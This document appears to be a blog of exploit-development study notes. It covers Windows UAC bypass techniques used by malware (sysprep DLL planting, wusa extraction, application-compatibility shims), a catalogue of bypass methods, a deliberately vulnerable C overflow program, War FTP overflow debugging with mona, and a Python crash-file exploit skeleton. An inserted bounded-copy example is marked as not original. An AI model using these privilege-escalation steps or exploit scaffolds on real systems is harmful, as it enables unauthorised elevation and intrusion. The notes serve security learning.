Vitali Kremez
Exploit development

Software Exploitation in Windows Environment

9/12/2016

Source: OpenSecurityTraining.info
Part 1

Fuzzing and crash dump analysis
From crash dump to working exploit lab in WinDBG

Here is a very basic program to help us explore our exploit environment. The basic_vuln program reads in a binary file and displays the first 64 hexadecimal bytes from that file. The program prints various metadata such as the location of variables and functions in the process address space. This meta information will help simplify the exploitation process as we are learning.

UAC Turn Off Method: WinNT Simda

7/16/2016

  • ISecurityEditor WinNT/Simda method, used to turn off UAC, works from Windows 7 up to Windows 10th1 100136

1. ucmMasqueradedAlterObjectSecurityCOM
* Purpose:
* Change object security through ISecurityEditor(SetNamedInfo).

2. ucmSimdaTurnOffUac
* Purpose:
* Disable UAC using AutoElevated undocumented ISecurityEditor interface.
* Used by WinNT/Simda since 2010.

UAC Bypass: The Carberp Style

7/16/2016

  • Wusa method used by Win32/Carberp

static const char* uacTargetDir[] = { "system32\\sysprep", "ehome" };
static const char* uacTargetApp[] = { "sysprep.exe", "mcx2prov.exe" };
static const char* uacTargetDll[] = { "cryptbase.dll", "CRYPTSP.dll" };
static const char* uacTargetMsu[] = { "cryptbase.msu", "CRYPTSP.msu" };

Steps to reproduce:
1. Make a .cab archive containing your own cryptbase.dll or wdscore.dll and rename it to .MSU
2. Deploy the .MSU to any system directory you want with wusa.exe. For example: wusa.exe PACKAGE.MSU /quiet /extract:%WINDIR%\system32\migwiz
3. Run migwiz.exe

UAC Bypass Method: Application Compatibility a/k/a Dridex Method

7/12/2016

Source: http://blog.jpcert.or.jp/2015/02/a-new-uac-bypass-method-that-dridex-uses.html

This UAC bypass method encompasses manipulating application compatibility databases.

Method of Operation:
  1. Dridex creates an application compatibility database ($$$.sdb), a batch file ($$$.bat) and a copy of itself (edg3FAC.exe)
  2. Dridex uses the sdbinst command to install/uninstall application compatibility databases to install $$$.sdb.
  3. Dridex launches the iscsicli command, which is a command line tool for iSCSI initiator. However, the configuration in the installed application compatibility database ($$$.sdb) causes iscsicli.exe to execute $$$.bat with administrative privileges.
  4. $$$.bat executes edg3FAC.exe with administrative privileges.
  • Auto-elevation programs such as sdbinst.exe and iscsicli.exe automatically elevate privileges to administrative privileges when launched without a UAC warning being displayed.
  • The sdbinst command, which can change the behavior of other programs, is an auto-elevation program.
1. ucmInitAppHelp
* Purpose:
* Initialize AppHelp routines.

2. ucmRegisterAndRunTarget
* Purpose:
* Register shim database and execute target app.

3. ucmShimRedirectEXE
* Purpose:
* Build, register shim database and execute target app.
* Initially used in BlackEnergy2 and Gootkit by mzH (alive-green).
* Currently used in a number of trojans (Win32/Dyre, WinNT/Cridex).

tidShim = SdbBeginWriteListTag(hShimDb, TAG_SHIM_REF);
if (tidShim != TAGID_NULL) {
    SdbWriteStringTag(hShimDb, TAG_NAME, L"RedirectEXE");
    SdbWriteStringTag(hShimDb, TAG_COMMAND_LINE, lpszPayloadEXE);
    SdbEndWriteListTag(hShimDb, tidShim);
}
SdbEndWriteListTag(hShimDb, tidEXE);

4. ucmAppcompatElevation
* Purpose:
* AutoElevation using Application Compatibility engine.

Defeating UAC Using Sysprep and Tilon/Pitou

7/11/2016

  • 1 - Leo Davidson sysprep method, this will work only on Windows 7 and Windows 8, used in multiple malware;
  • 2 - Tweaked Leo Davidson sysprep method, this will work only on Windows 8.1.9600;
  • 3 - Leo Davidson method tweaked by WinNT/Pitou developers, works from Windows 7 up to 10th2 10532;
* Leo Davidson AutoElevation method with derivatives.
*
* UacMethodSysprep1   - Original Leo Davidson concept.
* UacMethodSysprep2   - Windows 8.1 adapted UacMethodSysprep1 (bypassing sysprep embedded manifest dlls redirection).
* UacMethodTilon      - Leo Davidson concept with different target dll, used by Win32/Tilon.
* UacMethodSysprep3   - Windows 10 TH1 adapted UacMethodSysprep1.
* UacMethodOobe       - WinNT/Pitou derivative from Leo Davidson concept

Typical malware UAC bypass:
  1. Creates a DLL in %temp%;
  2. Injects code into the running explorer.exe, and explorer.exe moves the DLL from %temp% to C:\Windows\System32\sysprep\cryptbase.dll;
  3. C:\Windows\System32\sysprep\sysprep.exe is executed and loads C:\Windows\System32\sysprep\cryptbase.dll with administrative privileges; and
  4. C:\Windows\System32\sysprep\cryptbase.dll executes the malware with administrative privileges.

UACME Project

7/11/2016

Source: https://github.com/hfiref0x/UACME

The following are the 22 most popular methods to bypass User Account Control (UAC), as catalogued by the UACME project:
  • 1 - Leo Davidson sysprep method, this will work only on Windows 7 and Windows 8, used in multiple malware;
  • 2 - Tweaked Leo Davidson sysprep method, this will work only on Windows 8.1.9600;
  • 3 - Leo Davidson method tweaked by WinNT/Pitou developers, works from Windows 7 up to 10th2 10532;
  • 4 - Application Compatibility Shim RedirectEXE method, from WinNT/Gootkit. Works from Windows 7 up to 8.1.9600;
  • 5 - ISecurityEditor WinNT/Simda method, used to turn off UAC, works from Windows 7 up to Windows 10th1 100136;
  • 6 - Wusa method used by Win32/Carberp, tweaked to work with Windows 8/8.1 also;
  • 7 - Wusa method, tweaked to work from Windows 7 up to 10th1 10136;
  • 8 - Slightly modified Leo Davidson method used by Win32/Tilon, works only on Windows 7;
  • 9 - Hybrid method, combination of WinNT/Simda and Win32/Carberp + AVrf, works from Windows 7 up to 10th1 10136;
  • 10 - Hybrid method, abusing appinfo.dll way of whitelisting autoelevated applications and KnownDlls cache changes, works from Windows 7 up to 10th2 10532;
  • 11 - WinNT/Gootkit second method based on the memory patching from MS "Fix it" patch shim (and as side effect - arbitrary dll injection), works from Windows 7 up to 8.1.9600;
  • 12 - Windows 10 sysprep method, abusing different dll dependency added in Windows 10 (works up to 10th2 10558);
  • 13 - Hybrid method, abusing Microsoft Management Console and EventViewer missing dependency, works from Windows 7 up to 10rs1 14295;
  • 14 - WinNT/Sirefef method, abusing appinfo.dll way of whitelisting OOBE.exe, works from Windows 7 up to 10th2 10558;
  • 15 - Win32/Addrop method, also used in Metasploit uacbypass module, works from Windows 7 up to 10rs1 14295;
  • 16 - Hybrid method working together with Microsoft GWX backdoor, works from Windows 7 up to 10rs1 14295;
  • 17 - Hybrid method, abuses appinfo whitelist/logic/API choice&usage, works from Windows 8.1 (9600) up to 10rs1 14367;
  • 18 - Hybrid method, abuses SxS undocumented backdoor used to fix (1) and appinfo whitelist, works from Windows 7 up to 10rs1 14367;
  • 19 - Hybrid method, using InetMgr IIS module and based on 10 & 16 MS fixes, works from Windows 7 up to 10rs1 14372;
  • 20 - Hybrid method, abusing Microsoft Management Console and incorrect dll loading scheme, works from Windows 7 up to 10rs1 14383;
  • 21 - Hybrid method, abusing SxS DotLocal and targeting sysprep, works from Windows 7 up to 10rs1 14383;
  • 22 - Hybrid method, abusing SxS DotLocal and targeting consent to gain system privileges, works from Windows 7 up to 10rs1 14383.

Buffer Overflow: Example in C

6/27/2016

Simple Buffer Overflow Vulnerability
  • Vulnerable overflow_example.c
  • Command used to exploit it
gcc -o overflow_example overflow_example.c
./overflow_example 1234567890


overflow_example.c:
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    int value = 5;
    char buffer_one[8], buffer_two[8];

    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }

    strcpy(buffer_one, "one"); /* Put "one" into buffer_one. */
    strcpy(buffer_two, "two"); /* Put "two" into buffer_two. */
    printf("[BEFORE] buffer_two is at %p and contains '%s'\n", (void *)buffer_two, buffer_two);
    printf("[BEFORE] buffer_one is at %p and contains '%s'\n", (void *)buffer_one, buffer_one);
    printf("[BEFORE] value is at %p and is %d (0x%08x)\n", (void *)&value, value, value);
    printf("\n[STRCPY] copying %zu bytes into buffer_two\n\n", strlen(argv[1]));
    strcpy(buffer_two, argv[1]); /* Copy first argument into buffer_two: unbounded, this is the deliberate overflow. */
    printf("[AFTER] buffer_two is at %p and contains '%s'\n", (void *)buffer_two, buffer_two);
    printf("[AFTER] buffer_one is at %p and contains '%s'\n", (void *)buffer_one, buffer_one);
    printf("[AFTER] value is at %p and is %d (0x%08x)\n", (void *)&value, value, value);
    return 0;
}
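As an added example that is not part of the original post, here is the same stack layout with the unbounded strcpy replaced by a length-checked copy that refuses input that does not fit, so the 10-byte argument from the command above is rejected instead of spilling past the end of buffer_two. The names copy_bounded, hardened_example and hardened_value_intact are chosen for this example.

```c
#include <stdio.h>
#include <string.h>

/* Bounded replacement for strcpy (name chosen for this example).
 * Returns 0 when src and its terminating NUL fit in dst, -1 otherwise;
 * dst is left untouched on failure, so neighbouring stack data is never
 * corrupted. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0 || len + 1 > dst_size)
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Same locals as overflow_example.c, but the copy of `input` into
 * buffer_two is bounded. Returns 1 when the input was copied, 0 when it
 * was rejected as too long. If value_after is non-NULL, the local `value`
 * is reported through it so a caller can confirm it still reads 5. */
int hardened_example(const char *input, int *value_after)
{
    int value = 5;
    char buffer_one[8], buffer_two[8];
    int copied;

    copy_bounded(buffer_one, sizeof buffer_one, "one");
    copy_bounded(buffer_two, sizeof buffer_two, "two");

    copied = (copy_bounded(buffer_two, sizeof buffer_two, input) == 0);
    if (!copied)
        printf("[REJECT] %zu bytes do not fit in buffer_two (%zu bytes incl. NUL)\n",
               strlen(input), sizeof buffer_two);

    printf("[AFTER] buffer_two contains '%s'\n", buffer_two);
    printf("[AFTER] buffer_one contains '%s'\n", buffer_one);
    printf("[AFTER] value is %d\n", value);

    if (value_after)
        *value_after = value;
    return copied;
}

/* Returns 1 when `value` still reads 5 after the copy attempt for `input`. */
int hardened_value_intact(const char *input)
{
    int value_after = 0;
    hardened_example(input, &value_after);
    return value_after == 5;
}

int main(int argc, char *argv[])
{
    /* Constructed default input: the same 10-byte argument used on the page. */
    const char *input = argc > 1 ? argv[1] : "1234567890";
    int value_after = 0;
    int copied = hardened_example(input, &value_after);
    printf("copied=%d value=%d\n", copied, value_after);
    return 0;
}
```

An 8-byte buffer holds at most 7 characters plus the terminator, so an 8-character argument is rejected as well; that boundary is the one strncpy-style fixes most often get wrong.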

War FTP 1.65 Buffer Overflow Part 1

6/15/2016

Source: Cybrary: Advanced Penetration Testing

  • Give the program too much input in the username (USER) field
  • The saved return pointer will be overwritten with our attacker-controlled input

Immunity Debugger
  • Go to File ->Attach -> war-ftpd

Setup Logging:
  • !mona config -set workingfolder C:\logs\%p

Identifying the Overwrite
  • !mona pattern_create 1100
=======================================================================
  Output generated by mona.py v2.0, rev 566 - Immunity Debugger
=======================================================================
  OS : xp, release 5.1.2600
  Process being debugged : war-ftpd (pid 4332)
  Current mona arguments: pattern_create 1100
=======================================================================
=======================================================================

Pattern of 1100 bytes :
-----------------------

ASCII:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk


UAC Bypass

6/14/2016

Source: http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html

Let's begin with the sysprep method, which is the most commonly used method of bypassing UAC. Made famous by Leo Davidson in 2009, it involves the following steps:

1. Copy/plant a DLL in the C:\Windows\System32\sysprep directory. The name of the DLL depends on the Windows version:
   CRYPTBASE.dll for Windows 7
   shcore.dll for Windows 8
2. Execute sysprep.exe from the above directory. It will load the above DLL and execute it with elevated privileges.

In fact, all the UAC bypass methods involve playing with DLL and executable names and locations. See the table below:

Writing Exploits with Mona

6/13/2016

http://blog.pusheax.com/2013/03/exploit-writing-stack-based-buffer.html

0. Immunity Debugger
1. !mona update
2. Attach to the process
3. !mona config -set workingfolder c:\logs\%p

4. !mona pattern_create 2000
5. !mona pattern_offset 37694136  (the EIP value at the time of the crash)
6. Modify the script:

print("Creating exploit.")
push = "A" * 260    # Offset found by mona.py pattern_offset
eip = "BBBB"        # 4 more bytes to overwrite EIP
junk = "C" * 1736   # Later will be replaced with real shellcode
try:
    # Create the file
    with open("crash-me.PLF", "w") as f:
        f.write(push + eip + junk)
    print("File created")
except IOError:
    print("File cannot be created")

Our next goals will be:

1. Replacing "BBBB" with a valid pointer (a pointer to ESP, where ESP will hold the shellcode)
2. Solving an easy problem with the "CCCC..." that follows EIP.
3. Replacing "CCCCCC..." with real shellcode.

7. !mona jmp -r esp -o
